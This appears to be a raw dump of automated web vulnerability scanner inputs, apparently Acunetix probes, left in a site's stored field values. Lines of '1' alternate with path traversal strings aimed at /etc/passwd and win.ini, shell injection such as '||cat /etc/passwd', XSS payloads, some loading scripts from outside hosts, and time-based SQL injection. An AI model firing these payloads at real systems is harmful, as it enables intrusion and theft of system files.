../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

!(()&&!|*|*|

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?989983></ScRiPt>

testasp.vulnweb.com

1

-1))

1<ScRiPt >prompt(992950)</ScRiPt>

^(#$!@#$)(()))******

'

.\./.\./.\./.\./.\./.\./etc/passwd

1

1

1<video><source onerror="javascript:prompt(962483)">

'"()

WEB-INF/web.xml

1

1

UBWD1cxQ'

1

1

/etc/passwd

"

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(901105)"></g></svg>

1

WEB-INF\web.xml

zNxSvg2a')

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

||cat /etc/passwd

1<div style=width:expression(prompt(947805))>

1

1

PEDEnXeu'))

1

1

1

-1

1

1<iframe src='data:text/html

'

&dir

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

-1)

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1<body onload=prompt(923012)>

1

1

"

-1))

1

acunetix_wvs_invalid_filename

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(920576)>

................etc/passwd

'&dir&'

${@print(md5(acunetix_wvs_security_test))}

1

x8ohFGsw'

comments

http://hitU9vvIQeSnG.bxss.me/

1

1

${@print(md5(acunetix_wvs_security_test))}\

1<img src=xyz OnErRor=prompt(982439)>

0RHJhW5Z')

comments

1

1

"&dir&"

1

hSatAbwu'))

1<img/src=">" onerror=alert(979195)>

comments/.

1

1

file:///etc/passwd

1

1

1<ScRiPt%20>prompt(955366)</sCripT>

1

|dir

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

1&lt

/\../\../\../\../\../\../\../etc/passwd

1

1

1

1

1

1

WEB-INF/web.xml

1

1

'|dir

<img acu onmouseover=prompt(940825) //>

http://www.acunetix.tst

1

'"

1

1'"()&%<ScRiPt >prompt(939888)</ScRiPt>

1

1

1<input autofocus onfocus=prompt(971393)>

1

WEB-INF\web.xml

"|dir

<!--

1

'"()&%<ScRiPt >prompt(944769)</ScRiPt>

1

../../../../../../../../../../windows/win.ini

<a href='http://www.acunetix.com'>website security</a>

1

1

1_915101

1

1

1

response.write(9128115*9963528)

../../../../../../../../../../boot.ini

[url=http://www.acunetix.com]website security[/url]

1

1

1

'+response.write(9128115*9963528)+'

&cat /etc/passwd&

../../../../../../../../../../windows/win.ini.jpg

"+response.write(9128115*9963528)+"

1_I8GbN <ScRiPt >prompt(906616)</ScRiPt>

1

1

windowswin.ini

'&cat /etc/passwd&'

1

1

1

1

1

1

1

................windowswin.ini

1

1

1

"&cat /etc/passwd&"

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

../../../../../../../../../../etc/passwd

1

SomeCustomInjectedHeader:injected_by_wvs

cat /etc/passwd

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

`cat /etc/passwd`

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

../../../../../../../../../../etc/passwd.jpg

1

1

${100353+100163}

1

acu9379<s1﹥s2ʺs3ʹuca9379

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

|cat /etc/passwd#

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

acux9671z1z2abcxuca9671

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

'|'ld

1

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1<ScRiPt >prompt(946529)</ScRiPt>

1

1&n990416=v991517

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

"|"ld

1

)

1<script>prompt(935106)</script>

/../..//../..//../..//../..//../..//etc/passwd.jpg

WEB-INF/web.xml

-1

1

1

1some_inexistent_file_with_long_name%00.jpg

1<ScRiPt >prompt(975017)</ScRiPt>

!(()&&!|*|*|

1

WEB-INF\web.xml

.\./.\./.\./.\./.\./.\./etc/passwd

-1)

^(#$!@#$)(()))******

1

'

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?960535></ScRiPt>

1

1

-1))

1

/etc/passwd

1<ScRiPt >prompt(985157)</ScRiPt>

testasp.vulnweb.com

"

'"()

1

uXuJhlmv'

1

1

1<video><source onerror="javascript:prompt(995469)">

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

rRjkRhps')

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(905174)"></g></svg>

||cat /etc/passwd

1

1

kINoPtHn'))

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1<div style=width:expression(prompt(953981))>

1

-1

1

'

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

................etc/passwd

&dir

1<iframe src='data:text/html

-1)

1

"

1

1

-1))

${@print(md5(acunetix_wvs_security_test))}

1

1<body onload=prompt(985072)>

1

1

'&dir&'

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(972382)>

KXV2IiSq'

${@print(md5(acunetix_wvs_security_test))}\

http://hiteoISPcdtBd.bxss.me/

acunetix_wvs_invalid_filename

1

1

1

1<img src=xyz OnErRor=prompt(994676)>

afNCO5yn')

comments

1

1

1

1

file:///etc/passwd

"&dir&"

lP3HaVoR'))

1<img/src=">" onerror=alert(905547)>

comments

1

1

1

|dir

1

comments/.

/\../\../\../\../\../\../\../etc/passwd

1<ScRiPt%20>prompt(907291)</sCripT>

1

1

1

1

1

WEB-INF/web.xml

1

'|dir

1&lt

1

http://www.acunetix.tst

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

'"

"|dir

WEB-INF\web.xml

1

<img acu onmouseover=prompt(948582) //>

<!--

1

1

1

1

1

1

../../../../../../../../../../windows/win.ini

1

1<input autofocus onfocus=prompt(995702)>

1

1

1

response.write(9801189*9651157)

1'"()&%<ScRiPt >prompt(976631)</ScRiPt>

1

../../../../../../../../../../boot.ini

<a href='http://www.acunetix.com'>website security</a>

1

1

1

'+response.write(9801189*9651157)+'

'"()&%<ScRiPt >prompt(926403)</ScRiPt>

../../../../../../../../../../windows/win.ini.jpg

1

&cat /etc/passwd&

1

[url=http://www.acunetix.com]website security[/url]

SomeCustomInjectedHeader:injected_by_wvs

1

1_943611

"+response.write(9801189*9651157)+"

1

windowswin.ini

'&cat /etc/passwd&'

1

1_01xW1 <ScRiPt >prompt(980762)</ScRiPt>

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

"&cat /etc/passwd&"

................windowswin.ini

1

1

1

1

1

cat /etc/passwd

1

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

`cat /etc/passwd`

1

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

../../../../../../../../../../etc/passwd

1

1

1

|cat /etc/passwd#

1

1

acu5510<s1﹥s2ʺs3ʹuca5510

${99490+99299}

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

'|'ld

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

1

acux8208z1z2abcxuca8208

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

../../../../../../../../../../etc/passwd.jpg

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1&n980499=v935548

1

1<ScRiPt >prompt(981949)</ScRiPt>

1

"|"ld

)

-1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1<script>prompt(994006)</script>

1

1some_inexistent_file_with_long_name%00.jpg

1

!(()&&!|*|*|

-1)

1

WEB-INF/web.xml

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1<ScRiPt >prompt(908617)</ScRiPt>

^(#$!@#$)(()))******

1

'

1

-1))

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?935538></ScRiPt>

testasp.vulnweb.com

'"()

WEB-INF\web.xml

/../..//../..//../..//../..//../..//etc/passwd.jpg

"

1

ZaCAs5PL'

1

1

1<ScRiPt >prompt(976488)</ScRiPt>

1

1

.\./.\./.\./.\./.\./.\./etc/passwd

1

1<video><source onerror="javascript:prompt(929875)">

2hWSqG4A')

1

1

1

||cat /etc/passwd

1

1

1

/etc/passwd

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(962204)"></g></svg>

KYLkYX94'))

http://testasp.vulnweb.com/t/xss.html?%00.jpg

&dir

1

1

1

1<div style=width:expression(prompt(992777))>

1

-1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

'

1

1

'&dir&'

1<iframe src='data:text/html

1

-1)

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

"

http://hityzouyf2QOI.bxss.me/

1

"&dir&"

-1))

1<body onload=prompt(952639)>

1

1

1

................etc/passwd

acunetix_wvs_invalid_filename

${@print(md5(acunetix_wvs_security_test))}

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(921055)>

|dir

1

jbVsPFaY'

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

comments

1

${@print(md5(acunetix_wvs_security_test))}\

1<img src=xyz OnErRor=prompt(939219)>

1

'|dir

1

1

TJwrcqg6')

comments

1

http://www.acunetix.tst

1<img/src=">" onerror=alert(913556)>

"|dir

'"

file:///etc/passwd

5I8YdqY6'))

1

1'"()&%<ScRiPt >prompt(954786)</ScRiPt>

comments/.

1<ScRiPt%20>prompt(984159)</sCripT>

<!--

1

1

1

1

/\../\../\../\../\../\../\../etc/passwd

1

1

1

'"()&%<ScRiPt >prompt(991857)</ScRiPt>

1&lt

1

1

1

1

1

1

WEB-INF/web.xml

1

<img acu onmouseover=prompt(904100) //>

1

response.write(9669211*9966690)

1_944541

1

1

1

1<input autofocus onfocus=prompt(930383)>

WEB-INF\web.xml

'+response.write(9669211*9966690)+'

1

1

1

1

1

1

<a href='http://www.acunetix.com'>website security</a>

1

SomeCustomInjectedHeader:injected_by_wvs

&cat /etc/passwd&

"+response.write(9669211*9966690)+"

1

[url=http://www.acunetix.com]website security[/url]

../../../../../../../../../../windows/win.ini

1

1

SomeCustomInjectedHeader:injected_by_wvs

1_v52oD <ScRiPt >prompt(976365)</ScRiPt>

'&cat /etc/passwd&'

1

../../../../../../../../../../boot.ini

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

"&cat /etc/passwd&"

1

../../../../../../../../../../etc/passwd

1

1

windowswin.ini

cat /etc/passwd

1

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

................windowswin.ini

1

1

`cat /etc/passwd`

..\..\..\..\..\..\..\..\windows\win.ini

acu3375<s1﹥s2ʺs3ʹuca3375

1

1

${100383+99300}

1

1

../../../../../../../../../../etc/passwd.jpg

|cat /etc/passwd#

1

1

1

acux7800z1z2abcxuca7800

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1<ScRiPt >prompt(993879)</ScRiPt>

1

'|'ld

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1&n924192=v932271

1some_inexistent_file_with_long_name%00.jpg

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<script>prompt(961413)</script>

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

"|"ld

1

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<ScRiPt >prompt(932120)</ScRiPt>

testasp.vulnweb.com

.\./.\./.\./.\./.\./.\./etc/passwd

1

)

-1

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?955877></ScRiPt>

!(()&&!|*|*|

'

/etc/passwd

1

1

-1)

1

WEB-INF/web.xml

1<ScRiPt >prompt(958962)</ScRiPt>

^(#$!@#$)(()))******

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

"

-1))

WEB-INF\web.xml

1

1

1

1<video><source onerror="javascript:prompt(945630)">

||cat /etc/passwd

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

'"()

IiKRg5xS'

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(908426)"></g></svg>

1

&dir

1

1

VwxoWVk8'

1

1

................etc/passwd

1<div style=width:expression(prompt(995718))>

'

1

1

'&dir&'

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1<iframe src='data:text/html

1

1

"

8x8I3PUL')

http://hitQew6ca6Psh.bxss.me/

1

"&dir&"

1

1<body onload=prompt(977592)>

1

pMfWG8qW'))

file:///etc/passwd

acunetix_wvs_invalid_filename

${@print(md5(acunetix_wvs_security_test))}

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(959076)>

1

|dir

1

-1

1

1

${@print(md5(acunetix_wvs_security_test))}\

comments

1<img src=xyz OnErRor=prompt(933990)>

/\../\../\../\../\../\../\../etc/passwd

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

'|dir

1

-1)

1

comments

1<img/src=">" onerror=alert(995901)>

1

WEB-INF/web.xml

1

http://www.acunetix.tst

1<ScRiPt%20>prompt(985792)</sCripT>

comments/.

'"

"|dir

1

-1))

1'"()&%<ScRiPt >prompt(998876)</ScRiPt>

1&lt

WEB-INF\web.xml

1

<!--

1

1

1

'"()&%<ScRiPt >prompt(938230)</ScRiPt>

<img acu onmouseover=prompt(902987) //>

1

L6hs4ckZ'

1

1

1

../../../../../../../../../../windows/win.ini

1<input autofocus onfocus=prompt(923791)>

1

1

1

yXx2HMQR')

1_935319

1

1

1

../../../../../../../../../../boot.ini

response.write(9755796*9242043)

<a href='http://www.acunetix.com'>website security</a>

1

484kmNNM'))

1

1

1

'+response.write(9755796*9242043)+'

1

../../../../../../../../../../windows/win.ini.jpg

[url=http://www.acunetix.com]website security[/url]

1

1

&cat /etc/passwd&

"+response.write(9755796*9242043)+"

1

SomeCustomInjectedHeader:injected_by_wvs

1_RmZEd <ScRiPt >prompt(924210)</ScRiPt>

windowswin.ini

1

'&cat /etc/passwd&'

1

1

................windowswin.ini

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

../../../../../../../../../../etc/passwd

1

cat /etc/passwd

1

acu8655<s1﹥s2ʺs3ʹuca8655

1

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1

`cat /etc/passwd`

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

acux4697z1z2abcxuca4697

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

${99400+99098}

1

|cat /etc/passwd#

1<ScRiPt >prompt(940034)</ScRiPt>

1

1

../../../../../../../../../../etc/passwd.jpg

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1&n982943=v955712

1<script>prompt(903641)</script>

'|'ld

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

1some_inexistent_file_with_long_name%00.jpg

1<ScRiPt >prompt(931099)</ScRiPt>

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

WEB-INF/web.xml

"|"ld

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

-1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?945787></ScRiPt>

)

1

testasp.vulnweb.com

-1)

1

1

WEB-INF\web.xml

/../..//../..//../..//../..//../..//etc/passwd.jpg

1<ScRiPt >prompt(952116)</ScRiPt>

!(()&&!|*|*|

-1))

1

1

1

1

1

1<video><source onerror="javascript:prompt(995469)">

^(#$!@#$)(()))******

xSUX9wZq'

1

.\./.\./.\./.\./.\./.\./etc/passwd

'

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(999031)"></g></svg>

1

1

1

riVzDUz3')

1

/etc/passwd

"

1

1<div style=width:expression(prompt(938805))>

1

1

1

1

1

QWv7uvYI'))

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1<iframe src='data:text/html

||cat /etc/passwd

1

1

1

1

1

-1

&dir

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1<body onload=prompt(988931)>

1

1

'"()

1

-1)

................etc/passwd

'&dir&'

'

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(976987)>

1

1

1

1

1

-1))

"

1<img src=xyz OnErRor=prompt(908362)>

http://testasp.vulnweb.com/t/xss.html?%00.jpg

"&dir&"

1

dq2JgTFp'

${@print(md5(acunetix_wvs_security_test))}

1

1

1

1<img/src=">" onerror=alert(943396)>

1

|dir

${@print(md5(acunetix_wvs_security_test))}\

DDf0w3uQ')

http://hit0oLwrq5TZ6.bxss.me/

file:///etc/passwd

1

1<ScRiPt%20>prompt(980330)</sCripT>

acunetix_wvs_invalid_filename

1

1

1

1

'|dir

sZh273Et'))

1

/\../\../\../\../\../\../\../etc/passwd

comments

1&lt

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

"|dir

1

http://www.acunetix.tst

1

<img acu onmouseover=prompt(913505) //>

WEB-INF/web.xml

1

comments

1<input autofocus onfocus=prompt(951362)>

1

1

1

comments/.

WEB-INF\web.xml

'"

<a href='http://www.acunetix.com'>website security</a>

1

1

1

1'"()&%<ScRiPt >prompt(984049)</ScRiPt>

1

1

<!--

../../../../../../../../../../windows/win.ini

[url=http://www.acunetix.com]website security[/url]

1

1

1

'"()&%<ScRiPt >prompt(951134)</ScRiPt>

1

1

1

1_JKnYk <ScRiPt >prompt(908680)</ScRiPt>

1

../../../../../../../../../../boot.ini

1

1

1

1

1_999878

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

1

windowswin.ini

1

1

................windowswin.ini

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

acu1278<s1﹥s2ʺs3ʹuca1278

1

1

1

1

acux5390z1z2abcxuca5390

1

WEB-INF/web.xml

1<ScRiPt >prompt(982295)</ScRiPt>

1

1

WEB-INF\web.xml

1<script>prompt(929268)</script>

1

1

1<ScRiPt >prompt(979319)</ScRiPt>

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?932707></ScRiPt>

1

1

1<ScRiPt >prompt(974373)</ScRiPt>

1

1

1

1<video><source onerror="javascript:prompt(913478)">

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(920716)"></g></svg>

1

1

1<div style=width:expression(prompt(965020))>

1

1

1

1<iframe src='data:text/html

1

1

1<body onload=prompt(932240)>

1

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(969808)>

1

1<img src=xyz OnErRor=prompt(920024)>

1

1<img/src=">" onerror=alert(921665)>

1

1

1<ScRiPt%20>prompt(949880)</sCripT>

1

1&lt

1

<img acu onmouseover=prompt(916151) //>

1<input autofocus onfocus=prompt(913306)>

1

<a href='http://www.acunetix.com'>website security</a>

[url=http://www.acunetix.com]website security[/url]

1

1_1m4gL <ScRiPt >prompt(980692)</ScRiPt>

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1